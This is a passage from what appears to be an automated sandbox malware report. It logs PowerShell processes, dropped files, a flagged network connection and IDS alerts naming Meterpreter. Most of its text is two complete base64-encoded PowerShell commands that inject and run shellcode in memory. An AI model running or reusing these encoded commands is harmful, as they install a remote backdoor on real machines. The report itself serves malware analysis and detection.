G8AcgAoACQASAB5AD0AMAA7ACQASAB5ACAALQBsAGUAKAAkAG8AZAAuAEwAZQBuAGcAdABoAC0AMQApADsAJABIAHkAKwArACkAewAkAEoAVAA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHkAVQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABIAHkAKQAsACAAJABvAGQAWwAkAEgAeQBdACwAIAAxACkAfQA7ACQASgBUADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAHkAVQAsACAAMAB4ADEAMAAwADYALAAgADAAeAA0ADAALAAgAFsAUgBlAGYAXQAkAGsAYgBhACkAOwAkAGQAbQBPAD0AWwBpAG4AdABdADAAeAAwADAAOwAkAEoAVAA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABbAHUAaQBuAHQAMwAyAF0AWwBpAG4AdABdADAALAAkAGQAbQBPACwAJAB5AFUALAAwACwAMAAsADAAKQA7ACcAOwAkAEcATwA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcQBNACkAKQA7ACQATAB3AD0AIgBwAG8AdwBlAHIAcwBoAGUAbABsACIAOwAkAG4ASAA9ACIAVwBpAG4AZABvAHcAcwAiADsAJABTAFkAcQAgAD0AIAAiAEMAOgBcACQAbgBIAFwARAB4AGkAegBXAHYAagBhAFwAJABuAEgAJABMAHcAXAB2ADEALgAwAFwAJABMAHcAIgA7ACQAUwBZAHEAIAA9ACAAJABTAFkAcQAuAHIAZQBwAGwAYQBjAGUAKAAiAEQAeABpAHoAIgAsACAAIgBzAHkAcwAiACkAOwAkAFMAWQBxACAAPQAgACQAUwBZAHEALgByAGUAcABsAGEAYwBlACgAIgBXAHYAagBhACIALAAgACIAdwBvAHcANgA0ACIAKQA7ACQAVwB5AHgAIAA9ACAAJwBUAHIAIgArACIAdQAiACsAIgBlACcAOwBpAGYAKABbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBJAHMANgA0AEIAaQB0AE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACAALQBlAHEAIAAnACQAVwB5AHgAJwApAHsAJABMAHcAPQAgACQAUwBZAHEAfQA7ACQAWgBDAD0AIgAgACQATAB3ACAAVgBaAGcASgAgACQARwBPACIAOwAkAFoAQwA9ACQAWgBDAC4AcgBlAHAAbABhAGMAZQAoACIAVgBaAGcASgAiACwAIAAiAC0AbgBvAGUAeABpAHQAIAAtAGUAIgApADsAaQBlAHgAIAAkAFoAQwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2400 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -e JABOAG4APQAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZAAiACsAIgBsACIAKwAiAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAIgArACIAbAAiACsAIgBsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABrAGIAYQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAOwAkAG8AZAA9ACIAfQBlADgALAB9ADgAZgAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0ANgAwACwAfQA4ADkALAB9AGUANQAsAH0AMwAxACwAfQBkADIALAB9ADYANAAsAH0AOABiACwAfQA1ADIALAB9ADMAMAAsAH0AOABiACwAfQA1ADIALAB9ADAAYwAsAH0AOABiACwAfQA1ADIALAB9ADEANAAsAH0AOABiACwAfQA3ADIALAB9ADIAOAAsAH0AMABmACwAfQBiADcALAB9ADQAYQAsAH0AMgA2ACwAfQAzADEALAB9AGYAZgAsAH0AMwAxACwAfQBjADAALAB9AGEAYwAsAH0AMwBjACwAfQA2ADEALAB9ADcAYwAsAH0AMAAyACwAfQAyAGMALAB9ADIAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADQAOQAsAH0ANwA1ACwAfQBlAGYALAB9ADUAMgAsAH0ANQA3ACwAfQA4AGIALAB9ADUAMgAsAH0AMQAwACwAfQA4AGIALAB9ADQAMgAsAH0AMwBjACwAfQAwADEALAB9AGQAMAAsAH0AOABiACwAfQA0ADAALAB9ADcAOAAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0ANABjACwAfQAwADEALAB9AGQAMAAsAH0AOABiACwAfQA0ADgALAB9ADEAOAAsAH0ANQAwACwAfQA4AGIALAB9ADUAOAAsAH0AMgAwACwAfQAwADEALAB9AGQAMwAsAH0AOAA1ACwAfQBjADkALAB9ADcANAAsAH0AMwBjACwAfQA0ADkALAB9ADgAYgAsAH0AMwA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAA2ACwAfQAzADEALAB9AGYAZgAsAH0AMwAxACwAfQBjADAALAB9AGEAYwAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANAAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADAALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1ADgALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQA5ACwAfQA4ADAALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADUAZAAsAH0ANgA4ACwAfQAzADMALAB9ADMAMgAsAH0AMAAwACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA3ADMALAB9ADMAMgAsAH0ANQBmACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQA4ADkALAB9AGUAOAAsAH0AZgBmACwAfQBkADAALAB9AGIAOAAsAH0AOQAwACwAfQAwADEALAB9ADAAMAAsAH0AMAAwACwAfQAyADkALAB9AGMANAAsAH0ANQA0ACwAfQA1ADAALAB9ADYAOAAsAH0AMgA5ACwAfQA4ADAALAB9ADYAYgAsAH0AMAAwACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQAwAGEALAB9ADYAOAAsAH0AMABkACwAfQAzAGIALAB9ADAAZgAsAH0AYgA5ACwAfQA2ADgALAB9ADAAMgAsAH0AMAAwACwAfQA0ADMALAB9ADEAOQAsAH0AOAA5ACwAfQBlADYALAB9ADUAMAAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADQAMAAsAH0ANQAwACwAfQA2ADgALAB9AGUAYQAsAH0AMABmACwAfQBkAGYALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADkANwAsAH0ANgBhACwAfQAxADAALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADkAOQAsAH0AYQA1ACwAfQA3ADQALAB9ADYAMQAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADQALAB9ADAAYQAsAH0AZgBmACwAfQA0AGUALAB9ADAAOAAsAH0ANwA1ACwAfQBlAGMALAB9AGUAOAAsAH0ANgA3ACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADAAMAAsAH0ANgBhACwAfQAwADQALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAMwAsAH0AZgA4ACwAfQAwADAALAB9ADcAZQAsAH0AMwA2ACwAfQA4AGIALAB9ADMANgAsAH0ANgBhACwAfQA0ADAALAB9ADYAOAAsAH0AMAAwACwAfQAxADAALAB9ADAAMAAsAH0AMAAwACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA2ADgALAB9ADUAOAAsAH0AYQA0ACwAfQA1ADMALAB9AGUANQAsAH0AZgBmACwAfQBkADUALAB9ADkAMwAsAH0ANQAzACwAfQA2AGEALAB9ADAAMAAsAH0ANQA2ACwAfQA1ADMALAB9ADUANwAsAH0ANgA4ACwAfQAwADIALAB9AGQAOQAsAH0AYwA4ACwAfQA1AGYALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADMALAB9AGYAOAAsAH0AMAAwACwAfQA3AGQALAB9ADIAOAAsAH0ANQA4ACwAfQA2ADgALAB9ADAAMAAsAH0ANAAwACwAfQAwADAALAB9ADAAMAAsAH0ANgBhACwAfQAwADAALAB9ADUAMAAsAH0ANgA4ACwAfQAwAGIALAB9ADIAZgAsAH0AMABmACwAfQAzADAALAB9AGYAZgAsAH0AZAA1ACwAfQA1ADcALAB9ADYAOAAsAH0ANwA1ACwAfQA2AGUALAB9ADQAZAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0ANQBlACwAfQA1AGUALAB9AGYAZgAsAH0AMABjACwAfQAyADQALAB9ADAAZgAsAH0AOAA1ACwAfQA3ADAALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9AGUAOQAsAH0AOQBiACwAfQBmAGYALAB9AGYAZgAsAH0AZgBmACwAfQAwADEALAB9AGMAMwAsAH0AMgA5ACwAfQBjADYALAB9ADcANQAsAH0AYwAxACwAfQBjADMALAB9AGIAYgAsAH0AZgAwACwAfQBiADUALAB9AGEAMgAsAH0ANQA2ACwAfQA2AGEALAB9ADAAMAAsAH0ANQAzACwAfQBmAGYALAB9AGQANQAiADsAJABKAFQAPQBBAGQAZAAtAFQAeQBwAGUAIAAtAHAAYQBzAHMAIAAtAG0AIAAkAE4AbgAgAC0ATgBhAG0AZQAgACIAQQB1ACIAIAAtAG4AYQBtAGUAcwAgAEQAWABWADsAJABKAFQAPQAkAEoAVAAuAHIAZQBwAGwAYQBjAGUAKAAiAEQAWABWACIALAAgACIAVwBpAG4AMwAyAEYAdQBuAGMAdABpACIAKwAiAG8AIgArACIAbgBzACIAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAG8AZAAgAD0AIAAkAG8AZAAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACIAeQBFAFEAeAAiACkALgByAGUAcABsAGEAYwBlACgAIgB5AEUAUQAiACwAIAAiADAAIgApAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACQARQBIAD0AMAB4ADEAMAAwADYAOwBpAGYAIAAoACQAbwBkAC4ATAAgAC0AZwB0ACAAMAB4ADEAMAAwADYAKQB7ACQARQBIAD0AJABvAGQALgBMAH0AOwAkAHkAVQA9ACQASgBUADoAOgBjAGEAbABsAG8AYwAoADAAeAAxADAAMAA2ACwAIAAxACkAOwBbAFUASQBuAHQANgA0AF0AJABrAGIAYQAgAD0AIAAwADsAZgBvAHIAKAAkAEgAeQA9ADAAOwAkAEgAeQAgAC0AbABlACgAJABvAGQALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQASAB5ACsAKwApAHsAJABKAFQAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB5AFUALgBUAG8ASQBuAHQAMwAyACgAKQArACQASAB5ACkALAAgACQAbwBkAFsAJABIAHkAXQAsACAAMQApAH0AOwAkAEoAVAA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJAB5AFUALAAgADAAeAAxADAAMAA2ACwAIAAwAHgANAAwACwAIABbAFIAZQBmAF0AJABrAGIAYQApADsAJABkAG0ATwA9AFsAaQBuAHQAXQAwAHgAMAAwADsAJABKAFQAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAWwB1AGkAbgB0ADMAMgBdAFsAaQBuAHQAXQAwACwAJABkAG0ATwAsACQAeQBVACwAMAAsADAALAAwACkAOwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1992 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\m3m28zos.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3544 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESC814.tmp" "c:\Users\admin\AppData\Local\Temp\CSCC813.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3876 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EPTNLTZHDIAJHNQBU03D.temp | — | |
MD5:— | SHA256:— | |||
2268 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OUYD3OGGNPVNB01AQ4KW.temp | — | |
MD5:— | SHA256:— | |||
2400 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\REAF3P6HDBRV8GJ7F3UK.temp | — | |
MD5:— | SHA256:— | |||
1992 | csc.exe | C:\Users\admin\AppData\Local\Temp\m3m28zos.dll | — | |
MD5:— | SHA256:— | |||
1992 | csc.exe | C:\Users\admin\AppData\Local\Temp\m3m28zos.out | — | |
MD5:— | SHA256:— | |||
2268 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bc331.TMP | binary | |
MD5:4028388263805ABA00088A0BA4EEA515 | SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948 | |||
2268 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:4028388263805ABA00088A0BA4EEA515 | SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948 | |||
2400 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bc600.TMP | binary | |
MD5:4028388263805ABA00088A0BA4EEA515 | SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948 | |||
2400 | powershell.exe | C:\Users\admin\AppData\Local\Temp\m3m28zos.0.cs | text | |
MD5:8D28C45C236A309E6D3F66468BB6AD33 | SHA256:488CB48DBD6376F3FD78C7B1259E68B564DD593380B902C14DA955845FC64076 | |||
2400 | powershell.exe | C:\Users\admin\AppData\Local\Temp\m3m28zos.cmdline | text | |
MD5:165DA88389E3283504199CAD8B63D3EA | SHA256:FFBEC0EEAE955333A4AAE3657DB8629B97A787F27567659F6D105C3EF7BEC865 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2400 | powershell.exe | 13.59.15.185:17177 | — | Amazon.com, Inc. | US | malicious |
PID | Process | Class | Message |
---|---|---|---|
2400 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Possible Metasploit Payload Bind_API (from server) |
2400 | powershell.exe | Generic Protocol Command Decode | SURICATA Applayer Protocol detection skipped |
2400 | powershell.exe | A Network Trojan was detected | ET TROJAN Possible Metasploit Payload Common Construct Bind_API (from server) |
2400 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] BackDoor.Meterpreter.19 |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|